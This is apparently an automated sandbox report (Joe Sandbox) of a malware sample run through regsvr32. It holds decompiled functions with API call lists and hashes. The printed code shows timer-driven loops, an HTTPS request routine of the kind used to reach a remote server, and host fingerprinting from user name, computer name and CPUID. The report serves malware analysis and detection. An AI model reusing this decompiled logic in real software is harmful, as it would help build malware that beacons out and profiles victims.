                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02BD9E26
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02BD9E35
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,050095B0), ref: 02BD9E44
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD9E56
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 02BD9E65
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                • String ID: Ut
                                • API String ID: 3080378247-8415677
                                • Opcode ID: 590057f61d3b442c8717d91f0e73d3d3c7fa74903c199e11be1397ae37a01d5a
                                • Instruction ID: 4bf5a294a339021f409e5c6e4d35610d1943f3918efc458f34b06c4801054d15
                                • Opcode Fuzzy Hash: 590057f61d3b442c8717d91f0e73d3d3c7fa74903c199e11be1397ae37a01d5a
                                • Instruction Fuzzy Hash: 9D610732981602AFC711ABA4EC64FD67BEDEF48390F050915F988D7160F735E825DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD7C3D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150timememoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 83%
                                			E02BD7C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2bdd240);
					_v20 = 0;
					_v16 = 0;
					L02BDAF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2bdd26c; // 0x2b8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2bdd24c = 5;
						} else {
							_t68 = E02BD5319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2bdd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02BD2C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02BD9870(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2bdd244);
							goto L21;
						} else {
							__eflags =  *0x2bdd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02BD5433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2bdd248);
								L21:
								L02BDAF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2bdd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                0x02bd7c3d
                                0x02bd7c4f
                                0x02bd7c52
                                0x02bd7c5e
                                0x02bd7c64
                                0x02bd7c69
                                0x02bd7dd0
                                0x02bd7c6f
                                0x02bd7c6f
                                0x02bd7c71
                                0x02bd7c76
                                0x02bd7c77
                                0x02bd7c7d
                                0x02bd7c80
                                0x02bd7c83
                                0x02bd7c91
                                0x02bd7c9c
                                0x02bd7c9f
                                0x02bd7ca1
                                0x02bd7cae
                                0x02bd7cb8
                                0x02bd7cba
                                0x02bd7cbf
                                0x02bd7cc4
                                0x02bd7ccf
                                0x02bd7ccf
                                0x02bd7cc6
                                0x02bd7cc6
                                0x02bd7ccd
                                0x00000000
                                0x00000000
                                0x02bd7ccd
                                0x02bd7cd9
                                0x00000000
                                0x02bd7cdc
                                0x02bd7ce0
                                0x02bd7ceb
                                0x02bd7ceb
                                0x02bd7cf2
                                0x02bd7cfb
                                0x02bd7d02
                                0x02bd7d0b
                                0x02bd7d0e
                                0x02bd7d11
                                0x02bd7d16
                                0x02bd7d1b
                                0x00000000
                                0x00000000
                                0x02bd7d1d
                                0x02bd7d20
                                0x02bd7d23
                                0x02bd7d26
                                0x00000000
                                0x02bd7d28
                                0x02bd7d37
                                0x02bd7d37
                                0x00000000
                                0x02bd7d65
                                0x02bd7d65
                                0x02bd7d6a
                                0x02bd7d89
                                0x02bd7d8b
                                0x02bd7d90
                                0x02bd7d91
                                0x00000000
                                0x02bd7d6c
                                0x02bd7d6c
                                0x02bd7d72
                                0x00000000
                                0x02bd7d74
                                0x02bd7d74
                                0x02bd7d79
                                0x02bd7d7b
                                0x02bd7d80
                                0x02bd7d81
                                0x02bd7d97
                                0x02bd7d97
                                0x02bd7d9f
                                0x02bd7daa
                                0x02bd7dad
                                0x02bd7db8
                                0x02bd7dba
                                0x02bd7dbd
                                0x02bd7dbf
                                0x00000000
                                0x02bd7dc5
                                0x00000000
                                0x02bd7dc5
                                0x02bd7dbf
                                0x02bd7d72
                                0x00000000
                                0x02bd7d6a
                                0x02bd7d3a
                                0x02bd7d3c
                                0x02bd7d3f
                                0x02bd7d40
                                0x02bd7d40
                                0x02bd7d44
                                0x02bd7d4e
                                0x02bd7d4e
                                0x02bd7d54
                                0x02bd7d57
                                0x02bd7d57
                                0x02bd7d5d
                                0x02bd7d5d
                                0x02bd7dda
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 02BD7C52
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02BD7C5E
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02BD7C83
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02BD7C9F
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BD7CB8
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD7D4E
                                • CloseHandle.KERNEL32(?), ref: 02BD7D5D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02BD7D97
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02BD312C,?), ref: 02BD7DAD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BD7DB8
                                  • Part of subcall function 02BD5319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05009368,00000000,?,74E5F710,00000000,74E5F730), ref: 02BD5368
                                  • Part of subcall function 02BD5319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050093A0,?,00000000,30314549,00000014,004F0053,0500935C), ref: 02BD5405
                                  • Part of subcall function 02BD5319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD7CCB), ref: 02BD5417
                                • GetLastError.KERNEL32 ref: 02BD7DCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID: Ut
                                • API String ID: 3521023985-8415677
                                • Opcode ID: 5e3e999beb41eb3a64bdc8c382991552dd3e6db42d7dc859640dfcfd38f9aa3b
                                • Instruction ID: 2c4f02db696113050657d03f6643b279365c8fbe5a4f949ba6abda02a655bbbc
                                • Opcode Fuzzy Hash: 5e3e999beb41eb3a64bdc8c382991552dd3e6db42d7dc859640dfcfd38f9aa3b
                                • Instruction Fuzzy Hash: 8B515CB1C02229AFDB109F95DC44EEEFFB9EF49760F104A56F455E2190EB708650DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BDA85C, Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E02BDA85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E02BD1525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E02BD8B22(_t56);
					} else {
						E02BD8B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02BDA7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E02BD29C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x2bdd2a8; // 0x242a5a8
						_t15 = _t59 + 0x2bde743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                                0x02bda85c
                                0x02bda85c
                                0x02bda867
                                0x02bda86e
                                0x02bda876
                                0x02bda880
                                0x02bda886
                                0x02bda899
                                0x02bda8a9
                                0x02bda89b
                                0x02bda89e
                                0x02bda8a3
                                0x02bda8a3
                                0x02bda899
                                0x02bda8b9
                                0x02bda8bf
                                0x02bda8c4
                                0x02bda9b0
                                0x00000000
                                0x02bda8df
                                0x02bda8e2
                                0x02bda8f8
                                0x02bda8fe
                                0x02bda903
                                0x02bda92b
                                0x02bda93e
                                0x02bda948
                                0x02bda94b
                                0x02bda951
                                0x02bda956
                                0x00000000
                                0x00000000
                                0x02bda95a
                                0x02bda966
                                0x02bda977
                                0x02bda979
                                0x02bda98a
                                0x02bda98a
                                0x02bda99a
                                0x00000000
                                0x02bda9ac
                                0x00000000
                                0x02bda9ac
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bda903

                                APIs
                                • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 02BDA86E
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02BDA891
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02BDA8B9
                                • InternetSetStatusCallback.WININET(00000000,02BDA7F1), ref: 02BDA8D0
                                • ResetEvent.KERNEL32(?), ref: 02BDA8E2
                                • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 02BDA8F8
                                • GetLastError.KERNEL32 ref: 02BDA905
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 02BDA94B
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02BDA969
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02BDA98A
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02BDA996
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02BDA9A6
                                • GetLastError.KERNEL32 ref: 02BDA9B0
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 5a0cfb5204651f40e281bfd2e80f1cf85efe3401b3baffda3dca37c0efadde7b
                                • Instruction ID: 85cb65e16d073fec1b7bdba35e9017470eb9d345d70c0b7d979e9e28f6900b8c
                                • Opcode Fuzzy Hash: 5a0cfb5204651f40e281bfd2e80f1cf85efe3401b3baffda3dca37c0efadde7b
                                • Instruction Fuzzy Hash: 98419C72940205BFDB319FA1CC88EEBBFBDEB89744B104969F642D2190F731A555CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BDAC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 97 2bdac95-2bdacfa 98 2bdacfc-2bdad16 RaiseException 97->98 99 2bdad1b-2bdad45 97->99 100 2bdaecb-2bdaecf 98->100 101 2bdad4a-2bdad56 99->101 102 2bdad47 99->102 103 2bdad69-2bdad6b 101->103 104 2bdad58-2bdad63 101->104 102->101 105 2bdad71-2bdad78 103->105 106 2bdae13-2bdae1d 103->106 104->103 116 2bdaeae-2bdaeb5 104->116 110 2bdad88-2bdad95 LoadLibraryA 105->110 111 2bdad7a-2bdad86 105->111 108 2bdae1f-2bdae27 106->108 109 2bdae29-2bdae2b 106->109 108->109 112 2bdae2d-2bdae30 109->112 113 2bdaea9-2bdaeac 109->113 114 2bdadd8-2bdade4 InterlockedExchange 110->114 115 2bdad97-2bdada7 GetLastError 110->115 111->110 111->114 120 2bdae5e-2bdae6c GetProcAddress 112->120 121 2bdae32-2bdae35 112->121 113->116 124 2bdae0c-2bdae0d FreeLibrary 114->124 125 2bdade6-2bdadea 114->125 122 2bdada9-2bdadb5 115->122 123 2bdadb7-2bdadd3 RaiseException 115->123 117 2bdaec9 116->117 118 2bdaeb7-2bdaec4 116->118 117->100 118->117 120->113 128 2bdae6e-2bdae7e GetLastError 120->128 121->120 127 2bdae37-2bdae42 121->127 122->114 122->123 123->100 124->106 125->106 129 2bdadec-2bdadf8 LocalAlloc 125->129 127->120 130 2bdae44-2bdae4a 127->130 132 2bdae8a-2bdae8c 128->132 133 2bdae80-2bdae88 128->133 129->106 134 2bdadfa-2bdae0a 129->134 130->120 135 2bdae4c-2bdae4f 130->135 132->113 136 2bdae8e-2bdaea6 RaiseException 132->136 133->132 134->106 135->120 137 2bdae51-2bdae5c 135->137 136->113 137->113 137->120
                                C-Code - Quality: 51%
                                			E02BDAC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2bd0000;
				_t115 = _t139[3] + 0x2bd0000;
				_t131 = _t139[4] + 0x2bd0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2bd0000;
				_v16 = _t139[5] + 0x2bd0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2bd0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2bdd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2bdd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2bdd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2bdd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2bdd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2bdd198; // 0x0
										 *_t102 = _t125;
										 *0x2bdd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2bdd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                0x02bdaca4
                                0x02bdacba
                                0x02bdacc0
                                0x02bdacc2
                                0x02bdacc7
                                0x02bdaccd
                                0x02bdacd2
                                0x02bdacd5
                                0x02bdace3
                                0x02bdacea
                                0x02bdaced
                                0x02bdacf0
                                0x02bdacf1
                                0x02bdacf4
                                0x02bdacf7
                                0x02bdacfa
                                0x02bdacff
                                0x02bdad0e
                                0x00000000
                                0x02bdad14
                                0x02bdad1e
                                0x02bdad28
                                0x02bdad2d
                                0x02bdad2f
                                0x02bdad39
                                0x02bdad3c
                                0x02bdad3f
                                0x02bdad45
                                0x02bdad47
                                0x02bdad47
                                0x02bdad4a
                                0x02bdad4d
                                0x02bdad52
                                0x02bdad56
                                0x02bdad69
                                0x02bdad6b
                                0x02bdae13
                                0x02bdae13
                                0x02bdae1a
                                0x02bdae1d
                                0x02bdae27
                                0x02bdae27
                                0x02bdae2b
                                0x02bdaea9
                                0x02bdaeac
                                0x02bdaeae
                                0x02bdaeae
                                0x02bdaeb5
                                0x02bdaeb7
                                0x02bdaec1
                                0x02bdaec4
                                0x02bdaec7
                                0x02bdaec7
                                0x00000000
                                0x02bdae2d
                                0x02bdae30
                                0x02bdae5e
                                0x02bdae68
                                0x02bdae6c
                                0x02bdae74
                                0x02bdae77
                                0x02bdae7e
                                0x02bdae88
                                0x02bdae88
                                0x02bdae8c
                                0x02bdae91
                                0x02bdaea0
                                0x02bdaea6
                                0x02bdaea6
                                0x02bdae8c
                                0x00000000
                                0x02bdae37
                                0x02bdae3a
                                0x02bdae42
                                0x02bdae57
                                0x02bdae5c
                                0x00000000
                                0x00000000
                                0x02bdae5c
                                0x00000000
                                0x02bdae42
                                0x02bdae30
                                0x02bdae2b
                                0x02bdad71
                                0x02bdad78
                                0x02bdad88
                                0x02bdad8b
                                0x02bdad91
                                0x02bdad95
                                0x02bdadd8
                                0x02bdade4
                                0x02bdae0d
                                0x02bdade6
                                0x02bdadea
                                0x02bdadf0
                                0x02bdadf8
                                0x02bdadfa
                                0x02bdadfd
                                0x02bdae03
                                0x02bdae05
                                0x02bdae05
                                0x02bdadf8
                                0x02bdadea
                                0x00000000
                                0x02bdade4
                                0x02bdad9d
                                0x02bdada0
                                0x02bdada7
                                0x02bdadb7
                                0x02bdadba
                                0x02bdadca
                                0x00000000
                                0x02bdadd0
                                0x02bdadb1
                                0x02bdadb5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bdadb5
                                0x02bdad82
                                0x02bdad86
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bdad86
                                0x02bdad5f
                                0x02bdad63
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BDAD0E
                                • LoadLibraryA.KERNEL32(?), ref: 02BDAD8B
                                • GetLastError.KERNEL32 ref: 02BDAD97
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02BDADCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: fb8ea1ad492bdf0f6312831dafb8b6ae58f7ec156a8427d4011035a09cfba319
                                • Instruction ID: f2a746e1335dde0dfd858f1c1a197fe168ea5d73b5fb3c6f3b736a903908a1ea
                                • Opcode Fuzzy Hash: fb8ea1ad492bdf0f6312831dafb8b6ae58f7ec156a8427d4011035a09cfba319
                                • Instruction Fuzzy Hash: F7813A75A41205AFDB20CFA8D890BEEBBF5EF48344F248469E945E7240FB70E945CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD7A2E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 139 2bd7a2e-2bd7a42 140 2bd7a4c-2bd7a5e call 2bd4f97 139->140 141 2bd7a44-2bd7a49 139->141 144 2bd7a60-2bd7a70 GetUserNameW 140->144 145 2bd7ab2-2bd7abf 140->145 141->140 146 2bd7ac1-2bd7ad8 GetComputerNameW 144->146 147 2bd7a72-2bd7a82 RtlAllocateHeap 144->147 145->146 149 2bd7ada-2bd7aeb RtlAllocateHeap 146->149 150 2bd7b16-2bd7b3a 146->150 147->146 148 2bd7a84-2bd7a91 GetUserNameW 147->148 152 2bd7aa1-2bd7ab0 148->152 153 2bd7a93-2bd7a9f call 2bd2c0d 148->153 149->150 151 2bd7aed-2bd7af6 GetComputerNameW 149->151 154 2bd7af8-2bd7b04 call 2bd2c0d 151->154 155 2bd7b07-2bd7b0a 151->155 152->146 153->152 154->155 155->150
                                C-Code - Quality: 96%
                                			E02BD7A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2bdd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02BD4F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2bdd2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2bdd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02BD2C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0x2bdd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2bdd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02BD2C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0x2bdd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                0x02bd7a2e
                                0x02bd7a36
                                0x02bd7a3a
                                0x02bd7a3d
                                0x02bd7a42
                                0x02bd7a44
                                0x02bd7a49
                                0x02bd7a49
                                0x02bd7a4f
                                0x02bd7a51
                                0x02bd7a5e
                                0x02bd7abf
                                0x02bd7a60
                                0x02bd7a65
                                0x02bd7a6b
                                0x02bd7a70
